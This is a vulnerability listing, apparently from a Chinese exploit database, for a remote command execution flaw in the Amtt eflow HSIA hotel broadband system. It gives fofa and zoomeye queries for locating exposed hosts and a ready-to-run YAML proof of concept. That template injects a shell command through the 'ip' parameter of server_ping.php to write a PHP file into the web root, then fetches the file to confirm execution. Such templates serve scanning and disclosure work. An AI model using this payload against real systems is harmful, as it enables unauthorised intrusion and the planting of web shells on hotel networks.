amtt-eflow-hsia-server-ping-rce: Amtt eflow Hsia Server Ping RCE

日期: 2025-08-01 | 影响软件: amtt eflow hsia server | POC: 已公开

漏洞描述

fofa: title="酒店宽带运营系统" zoomeye: app="安美数字酒店宽带运营系统"

PoC代码[已公开]

id: amtt-eflow-hsia-server-ping-rce

info:
  name: Amtt eflow Hsia Server Ping RCE
  author: YekkoY
  severity: high
  verified: false
  description: |-
    fofa: title="酒店宽带运营系统"
    zoomeye: app="安美数字酒店宽带运营系统"
  reference:
    - https://amttgroup.com/product-01-HSIA.html
  tags: amtt,eflow,hsia,rce
  created: 2023/10/25

set:
  r2: randomLowercase(10)
rules:
  r0:
    request:
      method: GET
      path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
    expression: response.status == 200 && response.body.bcontains(b"parent.doTestResult")
  r1:
    request:
      method: GET
      path: /{{r2}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(md5(r2)))
expression: r0() && r1()

相关漏洞推荐